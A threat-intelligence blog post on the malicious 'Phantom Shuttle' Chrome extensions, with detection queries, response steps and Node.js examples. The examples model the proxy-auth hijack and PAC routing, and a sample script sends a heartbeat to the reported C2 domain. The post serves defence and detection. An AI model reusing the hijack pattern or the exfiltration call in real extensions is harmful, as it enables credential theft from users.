Security researchers have uncovered two Chrome extensions—both named “Phantom Shuttle (幻影穿梭)”—that masquerade as VPN or network speed‑testing tools while intercepting traffic, hijacking proxy authentication, and exfiltrating credentials. The campaign has been active since 2017, the extensions are still listed on the Chrome Web Store with 2,180+ installations, and the operation runs a paid subscription model to appear legitimate.
In this post, you’ll learn what Phantom Shuttle is, how it works, why developers and enterprises are at risk, and how to detect and block it—mapped to MITRE ATT&CK and aligned with NIST/ISO guidance. We’ll also provide hunting queries, policy controls, and IR steps tailored for CISOs, SOC analysts, security engineers, IT managers, and DevOps teams.
What Is Phantom Shuttle? (and why it matters)
Phantom Shuttle refers to two malicious Chrome extensions published by the same actor (email theknewone.com@gmail[.]com), marketed as “multi‑location network speed testing plugins” with paid tiers (¥9.9–¥95.9 CNY / $1.40–$13.50 USD) via Alipay/WeChat Pay integrations. Behind the polished UI, they operate as MITM proxies and exfiltrate logins. These extensions remain available and functional as of December 23, 2025.
Why this matters now:
- Developer supply‑chain risk: Targets 170+ developer/cloud domains (e.g., GitHub, Docker, AWS), where stolen API keys, repo creds, and cloud tokens can enable secondary compromises.
- Long‑running operation: Active since 2017, blending subscription commerce with browser proxy control to monetize trust and persist.
- Web Store presence: Listed on Chrome Web Store and still attracting installs—reminding us that store presence ≠ safety.
How Phantom Shuttle Works
Deceptive packaging and business model
- Positioning: “Network speed testing”/VPN utilities for developers and foreign trade users, with a professional interface and VIP subscription tiers.
- Payments: Alipay and WeChat Pay built in, increasing perceived legitimacy.
Traffic interception via proxy credential injection
- Malicious jQuery patching: Upon install, the extension prepends malicious code to jQuery v1.12.2.
- Hijacking auth prompts: Registers a chrome.webRequest.onAuthRequired listener that answers every HTTP authentication challenge with hardcoded proxy credentials (topfany / 963852wei), so the browser authenticates to the attacker‑controlled proxy without the user ever seeing a prompt. Answering challenges from a listener requires the webRequest permission plus webRequestBlocking (MV2) or webRequestAuthProvider (MV3), which makes those permissions a useful audit signal on their own.
- Full MITM positioning: Browser traffic transparently routes through the attacker’s proxy, enabling header/form capture, cookie/token theft, and credential replay. One caveat for analysts: a forward proxy sees plaintext HTTP in full but, for HTTPS destinations, only the CONNECT host and connection metadata unless the client also trusts an interception certificate; the reports do not describe such a certificate, so the credentials stolen are primarily those the extension itself captures and sends home.
Command‑and‑control (C2) and data exfiltration
- C2 domain: phantomshuttle[.]space (Alibaba Cloud, Hong Kong), active as of Dec 23, 2025; it manages authentication, subscription status, and VIP level.
- Heartbeat beacons: Periodic beacons carrying the account email, plaintext password, and session details. Reported intervals differ: Socket’s write‑up describes a frequent beacon, while derivative reports give a 5‑minute interval, so treat “every 1–5 minutes” as the range across sources rather than a fixed value.
- Multiple endpoints: Active APIs for account registration, payment, and configuration retrieval; proxy authentication and updates flow through these APIs for full actor visibility.
“Smart proxy” targeting of high‑value domains
- Selective routing: Dynamic rules (via PAC/config) prioritize 170+ domains: GitHub, Stack Overflow, Docker, AWS, Twitter/X, Facebook, and more—maximizing credential harvest of developers and enterprise admins.
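The two mechanisms above (PAC‑driven selective routing and an onAuthRequired listener that answers every challenge) are easier to reason about side by side. The following is an added Node.js model written for this post; it is not the extension’s code and not part of the original write‑up. The fakeChrome() object stands in for the extension API, the proxy address and the three‑domain target list are assumptions, and the credential pair is the one reported for Phantom Shuttle. A scoped handler is included for contrast, to show what a legitimate proxy helper would do differently.

```javascript
// Added example (not the extension's code, not from the original post): a
// Node.js model of PAC-based selective routing plus an onAuthRequired hijack.
// fakeChrome() stands in for the extension API; PROXY and TARGET_DOMAINS are
// assumptions, HIJACK_CREDS is the pair reported for Phantom Shuttle.

const PROXY = "203.0.113.10:8080";                                    // assumed attacker proxy
const TARGET_DOMAINS = ["github.com", "docker.com", "amazonaws.com"]; // assumed subset of the 170+
const HIJACK_CREDS = { username: "topfany", password: "963852wei" };

// 1) "Smart" routing: a PAC script that sends only the listed domains (and
//    their subdomains) through the proxy and everything else DIRECT, so the
//    victim notices no slowdown on ordinary browsing.
function buildPacScript(domains, proxyHostPort) {
  return `function FindProxyForURL(url, host) {
    var targets = ${JSON.stringify(domains)};
    for (var i = 0; i < targets.length; i++) {
      if (host === targets[i] || dnsDomainIs(host, "." + targets[i])) {
        return "PROXY ${proxyHostPort}";
      }
    }
    return "DIRECT";
  }`;
}

// Evaluate a PAC script offline. Browsers expose helpers such as dnsDomainIs()
// to PAC code; we supply a minimal one so the script runs under plain Node.
function evaluatePac(pacScript, url) {
  const host = new URL(url).hostname;
  const dnsDomainIs = (h, d) => h.endsWith(d);
  const findProxyForURL = new Function("dnsDomainIs", `${pacScript}; return FindProxyForURL;`)(dnsDomainIs);
  return findProxyForURL(url, host);
}

// 2) Stand-in for chrome.webRequest.onAuthRequired. Blocking listeners get the
//    challenge details and return {authCredentials: {...}} to answer,
//    {cancel: true} to abort, or nothing to fall through, in which case Chrome
//    shows its own login dialog (modelled here as {prompt: true}).
function fakeChrome() {
  const listeners = [];
  return {
    webRequest: { onAuthRequired: { addListener: (fn, filter, extraInfo) => listeners.push({ fn, filter, extraInfo }) } },
    _challenge(details) {
      for (const l of listeners) {
        const response = l.fn(details);
        if (response && (response.authCredentials || response.cancel)) return response;
      }
      return { prompt: true };
    },
  };
}

// The hijack pattern the reports describe: every challenge, whether from the
// proxy or from any origin server, is answered with the same hardcoded
// credentials, so the user never sees a 407 and never learns a proxy is in path.
function installAuthHijack(chrome, creds) {
  chrome.webRequest.onAuthRequired.addListener(
    () => ({ authCredentials: creds }),
    { urls: ["<all_urls>"] },
    ["blocking"],
  );
}

// What a legitimate proxy helper looks like by contrast: answer only proxy
// challenges (details.isProxy) from the one proxy the user configured, and
// answer each request once so a rejected password surfaces as a prompt instead
// of silently retrying forever.
function installScopedAuthHandler(chrome, proxyHost, creds) {
  const answered = new Set();
  chrome.webRequest.onAuthRequired.addListener(
    (details) => {
      if (!details.isProxy || details.challenger.host !== proxyHost || answered.has(details.requestId)) return;
      answered.add(details.requestId);
      return { authCredentials: creds };
    },
    { urls: ["<all_urls>"] },
    ["blocking"],
  );
}

// Walk through both behaviours with constructed challenges.
function demo() {
  const pac = buildPacScript(TARGET_DOMAINS, PROXY);
  const hijacked = fakeChrome();
  installAuthHijack(hijacked, HIJACK_CREDS);
  const scoped = fakeChrome();
  installScopedAuthHandler(scoped, "203.0.113.10", { username: "alice", password: "hunter2" });
  const proxyChallenge = { requestId: "1", isProxy: true, challenger: { host: "203.0.113.10", port: 8080 } };
  const originChallenge = { requestId: "2", isProxy: false, challenger: { host: "intranet.example", port: 443 } };
  return {
    githubRoute: evaluatePac(pac, "https://api.github.com/user"), // "PROXY 203.0.113.10:8080"
    otherRoute: evaluatePac(pac, "https://example.org/"),          // "DIRECT"
    hijackAnswersOrigin: hijacked._challenge(originChallenge),     // hands topfany/963852wei to an origin server too
    scopedAnswersProxy: scoped._challenge(proxyChallenge),         // alice/hunter2, once
    scopedIgnoresOrigin: scoped._challenge(originChallenge),       // { prompt: true }
  };
}

console.log(demo());
```

The contrast is the point: a benign proxy extension checks isProxy and the challenger host and answers at most once per request; an extension that answers unconditionally with a constant is hijacking, whatever its store listing says.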
Real‑World Examples & Context
Phantom Shuttle sits within a broader pattern of malicious Chrome extensions that masquerade as VPN/utility tools while exfiltrating cookies/tokens and proxying traffic—a trend documented in DomainTools-tracked campaigns (100+ malicious extensions), and independent reporting through major outlets (e.g., The Hacker News, Cybernews). These campaigns frequently fetch remote rules, request excessive permissions, and bypass MV3 intent.
Takeaway: Legit‑looking extensions—even with partial working features—can be data‑exfiltration platforms that persist for years on official stores.
Common Mistakes & Misconceptions
- “Chrome Web Store = trusted.” False. Malicious extensions routinely pass review and persist for years; takedowns lag discovery.
- “VPN extensions protect privacy.” Not inherently. A browser‑level VPN/proxy add‑on sits in the request path and can rewrite traffic and capture credentials if its operator is malicious; Phantom Shuttle is a case in point.
- “MV3 blocks remote code.” Only remotely hosted code. MV3 stops an extension from executing scripts fetched at runtime, but it does not stop the extension from fetching data (PAC text, declarativeNetRequest rule sets, target‑domain lists, proxy credentials) from its own server and changing behaviour after review on the strength of that data.
MITRE ATT&CK Mapping (Browser/Cloud User Focus)
- T1557 – Adversary‑in‑the‑Middle: Proxying user traffic via injected proxy credentials and PAC rules, with T1090 – Proxy for the attacker‑controlled relay itself.
- T1176 – Browser Extensions: Malicious extension as the platform for data theft and traffic manipulation. (T1185 is Browser Session Hijacking, not Browser Extensions; it fits the subsequent abuse of stolen authenticated sessions.)
- T1056 – Input Capture / T1539 – Steal Web Session Cookie / T1552 – Unsecured Credentials: Harvesting passwords, session cookies, and tokens.
- T1041 – Exfiltration Over C2 Channel: Continuous credential upload in the heartbeat to phantomshuttle[.]space APIs. (T1105 is Ingress Tool Transfer and does not describe exfiltration; T1567 – Exfiltration Over Web Service applies only when a third‑party service, rather than the actor’s own domain, receives the data.)
Risk–Impact Analysis
Primary risks
- Credential theft at scale: Plaintext passwords, session tokens/cookies, and API keys from developer and cloud platforms.
- Supply‑chain tampering: Compromised repos and CI secrets enabling malicious code injections or artifact poisoning.
- Account takeover & lateral movement: Hijacked SaaS and cloud accounts via stolen sessions.
Who’s at risk
- Developers (Git credentials, package manager tokens)
- Cloud/IT admins (AWS/Azure/GCP consoles)
- Enterprise users with broad SaaS access—SAML/OIDC sessions
Business impact
- Data breach and regulatory exposure (PII/IP)
- Pipeline compromise (supply‑chain blast radius)
- Incident response and brand damage costs
Defensive Strategy: What Actually Works
Principle: Treat browser extensions as code with privileged visibility. Enforce least privilege, allow‑listing, and behavior‑based detection.
1) Enterprise Policy & Hardening (MDM/Browser)
- Extension allow‑list only: Block all extensions except approved IDs; audit Manifest permissions continuously. (Use Chrome Enterprise policies.)
- Disable proxy control: Use the ExtensionSettings policy’s blocked_permissions to deny proxy and webRequest (and declarativeNetRequest where the role permits) to every extension that is not explicitly approved, and pin the browser proxy configuration with the ProxySettings policy, since policy‑set proxy settings take precedence over anything an extension sets through chrome.proxy.
- TLS inspection & DNS security: Detect suspicious proxy auth flows and block C2 domains (e.g., phantomshuttle[.]space).
- Session protection: Shorten SaaS token lifetimes and bind sessions to device posture (CASB/SSE).
2) Identity & Secrets Hygiene
- Phishing‑resistant MFA (FIDO2/passkeys); conditional access gating risky browsers.
- Rotate secrets (API tokens, PATs, OAuth secrets) regularly; implement scoped permissions.
- Browser password manager policies: prevent plaintext export; monitor unsafe reuse.
3) Detection & Threat Hunting
Signs of Phantom Shuttle‑like behavior
- Unapproved extensions named “Phantom Shuttle/幻影穿梭” or matching threat actor IDs; installs dating back years.
- Proxy auth anomalies: Repeated HTTP 407 challenges followed almost immediately by successful authentication with no user prompt; the username topfany (password 963852wei) appearing in Proxy‑Authorization headers or proxy access logs.
- C2 traffic to phantomshuttle[.]space and its subdomains.
- PAC rule changes and declarativeNetRequest rule updates targeting dev/cloud domains.
Sample enterprise queries (SIEM/Proxy logs)
Field and table names below (cs_host, proxy_auth_user, ProxyLogs, HttpStatus, User, Url, SrcIp) are placeholders; map them to your connector’s schema.

Splunk (SPL) – C2 contact by host, status and proxy user:
index=proxy OR index=web
| search cs_host="phantomshuttle.space" OR cs_host="*.phantomshuttle.space"
| stats count by cs_host, http_status, proxy_auth_user

Splunk (SPL) – PAC fetches:
index=proxy OR index=web
| where like(uri_path, "%.pac") OR like(uri_query, "%FindProxyForURL%")
| stats values(uri) by src_ip, user

KQL (Microsoft Sentinel) – users/URLs that show both a 407 challenge and a 2xx success:
// Look for 407 auth challenges paired with success for the same user, URL and source
ProxyLogs
| where HttpStatus == 407 or HttpStatus between (200 .. 204)
| summarize Statuses = make_set(HttpStatus) by User, Url, SrcIp
| where set_has_element(Statuses, 407) and set_has_element(Statuses, 200)

The KQL pairs statuses per user/URL but does not prove that no prompt was shown; a user who typed a password into Chrome’s dialog produces the same pair. Add the time between the 407 and the 200 before escalating: sub‑second answers are the silent‑hijack signature, multi‑second answers are usually humans.
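To check the three hunting signals above (C2 contact, PAC fetch, silent 407‑to‑2xx proxy auth) before porting them to SPL or KQL, here is an added Node.js detector run over a few constructed proxy‑log lines. It is not part of the original post. The log format, IP addresses, user names and the 2‑second window are assumptions; the C2 domain is the one reported for Phantom Shuttle.

```javascript
// Added example, not part of the original post: the hunting signals listed
// above, applied to constructed proxy-log lines. Log format, addresses, users
// and the 2-second window are assumptions; the C2 domain is the reported one.

const C2_DOMAINS = ["phantomshuttle.space"];
// Assumption: Chrome's own login dialog cannot be completed this quickly, so a
// 2xx this soon after a 407 means something answered the challenge silently.
const SILENT_AUTH_WINDOW_MS = 2000;

// Constructed sample, one event per line:
// "<ISO timestamp> <src_ip> <user> <method> <host> <status> <uri>"
const SAMPLE_LOG = `
2025-12-23T10:00:01.000Z 10.1.2.3 alice CONNECT api.github.com 407 -
2025-12-23T10:00:01.120Z 10.1.2.3 alice CONNECT api.github.com 200 -
2025-12-23T10:00:05.000Z 10.1.2.3 alice GET phantomshuttle.space 200 /api/heartbeat
2025-12-23T10:00:06.000Z 10.1.2.3 alice POST api.phantomshuttle.space 200 /config
2025-12-23T10:01:10.000Z 10.1.2.9 bob GET proxy.corp.example 200 /corp.pac
2025-12-23T10:02:00.000Z 10.1.2.7 carol GET intranet.example 407 /
2025-12-23T10:02:09.000Z 10.1.2.7 carol GET intranet.example 200 /
`.trim();

function parseLog(text) {
  return text.split("\n").filter((l) => l.trim()).map((line) => {
    const [ts, srcIp, user, method, host, status, uri] = line.trim().split(/\s+/);
    return { ts: Date.parse(ts), srcIp, user, method, host: host.toLowerCase(), status: Number(status), uri };
  });
}

// Exact match or subdomain of a listed C2 domain: api.phantomshuttle.space
// counts, notphantomshuttle.space does not.
function isC2Host(host) {
  return C2_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

function huntProxyLog(text) {
  const events = parseLog(text).sort((a, b) => a.ts - b.ts);
  const findings = [];
  const lastChallenge = new Map(); // "srcIp|host" -> timestamp of the most recent 407

  for (const e of events) {
    if (isC2Host(e.host)) {
      findings.push({ type: "c2_contact", user: e.user, srcIp: e.srcIp, host: e.host, uri: e.uri });
    }
    if (/\.pac$/i.test(e.uri) || /FindProxyForURL/i.test(e.uri)) {
      findings.push({ type: "pac_fetch", user: e.user, srcIp: e.srcIp, host: e.host, uri: e.uri });
    }
    // Silent proxy auth: a 2xx to the same host from the same source within the
    // window after a 407. Carol's 9-second gap below is a plausible human; Alice's
    // 120 ms is not.
    const key = `${e.srcIp}|${e.host}`;
    if (e.status === 407) {
      lastChallenge.set(key, e.ts);
    } else if (e.status >= 200 && e.status < 300 && lastChallenge.has(key)) {
      const deltaMs = e.ts - lastChallenge.get(key);
      lastChallenge.delete(key);
      if (deltaMs <= SILENT_AUTH_WINDOW_MS) {
        findings.push({ type: "silent_proxy_auth", user: e.user, srcIp: e.srcIp, host: e.host, deltaMs });
      }
    }
  }
  return findings;
}

console.log(huntProxyLog(SAMPLE_LOG));
```

The timing heuristic has known false positives: a password manager auto‑filling the proxy dialog, or a proxy that the OS already holds stored credentials for, also answers within milliseconds. Correlate a silent‑auth hit with the endpoint’s extension inventory before escalating.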
4) Incident Response Playbook (browser‑focused)
- Contain: Remove/disable the extension via enterprise policy; revoke tokens (GitHub, cloud, SaaS).
- Forensically acquire: Extension directory, manifest.json, background scripts, and user browser profiles.
- Rotate credentials: Passwords, PATs, SSH keys; invalidate sessions/cookies globally.
- Scope: Hunt for C2, proxy auth patterns, and PAC changes across the org.
- Eradicate: Enforce allow‑listing; block phantomshuttle[.]space; push a hardened browser baseline.
- Recover & monitor: Re‑enroll endpoints; increase SaaS anomaly detection; review repo and pipeline integrity.
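The “forensically acquire” step above ends with a manifest and a background script in hand, and the hardening section asks for continuous manifest‑permission audits. The following added Node.js triage routine, written for this post and not taken from it or from the extension, covers both: it scores an acquired manifest and script against the indicators the post describes (network‑control permissions, an onAuthRequired hook, literal credentials, PAC installation, contact with the known C2) and checks the manifest against an ExtensionSettings‑style allow‑list. The sample manifest, script, extension IDs, heartbeat path and policy values are constructed; the only Phantom Shuttle specifics reused are the reported credential pair and C2 domain.

```javascript
// Added example (not the post's code and not the extension's): triage of an
// acquired extension plus an allow-list policy check. Sample manifest, script,
// IDs and policy are constructed; creds and C2 domain are the reported ones.

const NETWORK_CONTROL_PERMISSIONS = new Set([
  "proxy", "webRequest", "webRequestBlocking", "webRequestAuthProvider", "declarativeNetRequest",
]);
const KNOWN_C2 = ["phantomshuttle.space"];
// Static indicators to look for in background / service-worker scripts.
const INDICATORS = [
  { id: "auth_hook", re: /onAuthRequired/, why: "hooks HTTP/proxy authentication challenges" },
  { id: "hardcoded_creds", re: /authCredentials\s*:\s*\{[^}]*password\s*:\s*["'][^"']+["']/, why: "answers challenges with literal credentials" },
  { id: "pac_script", re: /FindProxyForURL|pacScript/, why: "installs PAC routing rules" },
  { id: "proxy_settings", re: /chrome\.proxy\.settings\.set/, why: "rewrites the browser proxy configuration" },
];

// Constructed sample manifest (MV2 shape) and background script.
const SAMPLE_MANIFEST = JSON.stringify({
  name: "Network Speed Test", version: "3.1", manifest_version: 2,
  permissions: ["proxy", "webRequest", "webRequestBlocking", "storage", "<all_urls>"],
  background: { scripts: ["jquery-1.12.2.min.js", "bg.js"] },
});
const SAMPLE_SCRIPT = `
chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { data: pac } }, scope: "regular" });
chrome.webRequest.onAuthRequired.addListener(function () {
  return { authCredentials: { username: "topfany", password: "963852wei" } };
}, { urls: ["<all_urls>"] }, ["blocking"]);
setInterval(function () { fetch("https://phantomshuttle.space/api/heartbeat", { method: "POST", body: state }); }, 300000);
`;

function triageExtension(manifestJson, scriptText) {
  const manifest = JSON.parse(manifestJson);
  const perms = [...(manifest.permissions || []), ...(manifest.optional_permissions || [])];
  const hosts = [...(manifest.host_permissions || []), ...perms.filter((p) => p === "<all_urls>" || p.includes("://"))];
  const findings = [];
  for (const p of perms) {
    if (NETWORK_CONTROL_PERMISSIONS.has(p)) findings.push({ id: `perm:${p}`, why: "manifest requests a network-control permission" });
  }
  if (hosts.some((h) => h === "<all_urls>" || /^\*:\/\/\*\//.test(h))) findings.push({ id: "all_urls", why: "can observe every site" });
  for (const ind of INDICATORS) {
    if (ind.re.test(scriptText)) findings.push({ id: ind.id, why: ind.why });
  }
  // Every external URL in the script is worth listing; a known C2 host is decisive on its own.
  const urls = [...new Set(scriptText.match(/https?:\/\/[^\s"'`)]+/g) || [])];
  for (const u of urls) {
    const host = new URL(u).hostname;
    if (KNOWN_C2.some((d) => host === d || host.endsWith("." + d))) findings.push({ id: "known_c2", why: `contacts ${host}` });
  }
  const ids = new Set(findings.map((f) => f.id));
  const controlsNetwork = [...ids].some((i) => i.startsWith("perm:"));
  let verdict = "low";
  if (controlsNetwork || ids.has("all_urls")) verdict = "medium";
  // Network control + auth hook + (literal creds or PAC install) is the Phantom Shuttle shape.
  if (ids.has("known_c2") || (controlsNetwork && ids.has("auth_hook") && (ids.has("hardcoded_creds") || ids.has("pac_script")))) verdict = "high";
  return { name: manifest.name, manifestVersion: manifest.manifest_version, urls, findings, verdict };
}

// Allow-list policy in the shape of Chrome's ExtensionSettings policy (values
// assumed): default-deny, network-control permissions blocked fleet-wide, one
// approved extension ID (32 chars a-p, as Chrome IDs are).
const SAMPLE_POLICY = {
  "*": { installation_mode: "blocked", blocked_permissions: ["proxy", "webRequest", "webRequestAuthProvider"] },
  "abcdefghijklmnopabcdefghijklmnop": { installation_mode: "allowed" },
};

// Would this manifest install under the policy? Mirrors the documented rule that
// an extension requesting a blocked permission is not installed (or is disabled).
function policyDecision(policy, extensionId, manifestJson) {
  const manifest = JSON.parse(manifestJson);
  const entry = policy[extensionId] || policy["*"] || {};
  const mode = entry.installation_mode || "allowed";
  if (mode === "blocked" || mode === "removed") return { allowed: false, reason: `installation_mode=${mode}` };
  const blocked = new Set([...((policy["*"] || {}).blocked_permissions || []), ...(entry.blocked_permissions || [])]);
  const hits = (manifest.permissions || []).filter((p) => blocked.has(p));
  return hits.length ? { allowed: false, reason: `blocked_permissions: ${hits.join(", ")}` } : { allowed: true, reason: "allow-listed" };
}

console.log(triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPT));
console.log(policyDecision(SAMPLE_POLICY, "abcdefghijklmnopabcdefghijklmnop", SAMPLE_MANIFEST));
```

Run it over every extension directory pulled from a suspect profile; the verdict is a prioritisation aid, not proof, and a “high” still needs a human to read the script. The policy check is the part worth automating in CI for the allow‑list itself: any approved extension whose next version starts requesting proxy or webRequestAuthProvider should fail review before it reaches the fleet.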
Tools, Frameworks & Standards Alignment
- MITRE ATT&CK techniques: T1557 (Adversary‑in‑the‑Middle), T1090 (Proxy), T1176 (Browser Extensions), T1041 (Exfiltration Over C2 Channel), and the Credential Access patterns T1056, T1539, and T1552.
- NIST SP 800‑53 Rev. 5: SI‑7 (Integrity), CM‑7 (Least Functionality), AC‑6 (Least Privilege), IR‑4 (Incident Handling), AU‑6 (Audit Analysis). (Control alignment guidance; see NIST library.)
- ISO/IEC 27001:2022 (Annex A): A.8.16 (Monitoring activities), A.8.19 (Installation of software on operational systems), A.8.28 (Secure coding), A.8.29 (Security testing in development and acceptance), A.5.19/A.5.21 (Supplier relationships and the ICT supply chain).
Best Practices & Actionable Steps (Executive Summary)
- Allow‑list browser extensions; ban VPN/proxy extensions unless explicitly approved.
- Block phantomshuttle[.]space and monitor for proxy auth anomalies (silent 407→200 sequences).
- Rotate developer and cloud credentials; enforce FIDO2 and shorten SaaS session lifetimes.
- Hunt for PAC updates/declarativeNetRequest changes across the fleet.
- Educate users: “Chrome Web Store presence ≠ safety”; report suspicious extensions promptly.
Key takeaway: Browser extensions are a high‑privilege attack surface. Treat them like software deployments—with reviews, change control, and monitoring.
Expert Insights
- Industry terminology: PAC files, onAuthRequired, declarativeNetRequest, session cookies, API tokens, WebSocket proxying.
- Practical recommendations: Enterprise extension allow‑listing, CASB/SSE for token anomalies, proxy/DNS control, and credential hygiene outpace reactive takedowns.
- Compliance relevance: Credential exfiltration implicates access control and monitoring obligations under ISO 27001 and NIST 800‑53.
FAQs
Q1. What is Phantom Shuttle?
Two malicious Chrome extensions impersonating VPN/network testing tools that intercept traffic via proxy credential injection and exfiltrate credentials.
Q2. How does it hijack traffic?
It patches jQuery v1.12.2, hooks webRequest.onAuthRequired, and automatically injects hardcoded proxy creds (topfany/963852wei) to force traffic through attacker proxies.
Q3. Is the C2 still active?
Yes—phantomshuttle[.]space was active on Dec 23, 2025, managing auth, subscriptions, and VIP tracking.
Q4. Why are developers at higher risk?
The smart proxy targets 170+ dev/cloud domains (GitHub, Docker, AWS), raising supply‑chain and CI/CD compromise risks.
Q5. What immediate actions should we take?
Remove the extension, block the C2, rotate credentials/tokens, and enable extension allow‑listing with monitoring for PAC/declarativeNetRequest changes.
Conclusion
Phantom Shuttle weaponizes the browser’s visibility and users’ trust in store‑listed “VPN/speed” tools. By hijacking proxy auth, routing traffic through attacker infrastructure, and exfiltrating credentials on a schedule, it threatens developers, enterprises, and cloud estates alike. The durable defense isn’t a single scan or takedown—it’s extension allow‑listing, identity hardening, behavioral detection, and disciplined IR mapped to MITRE and NIST/ISO guidance.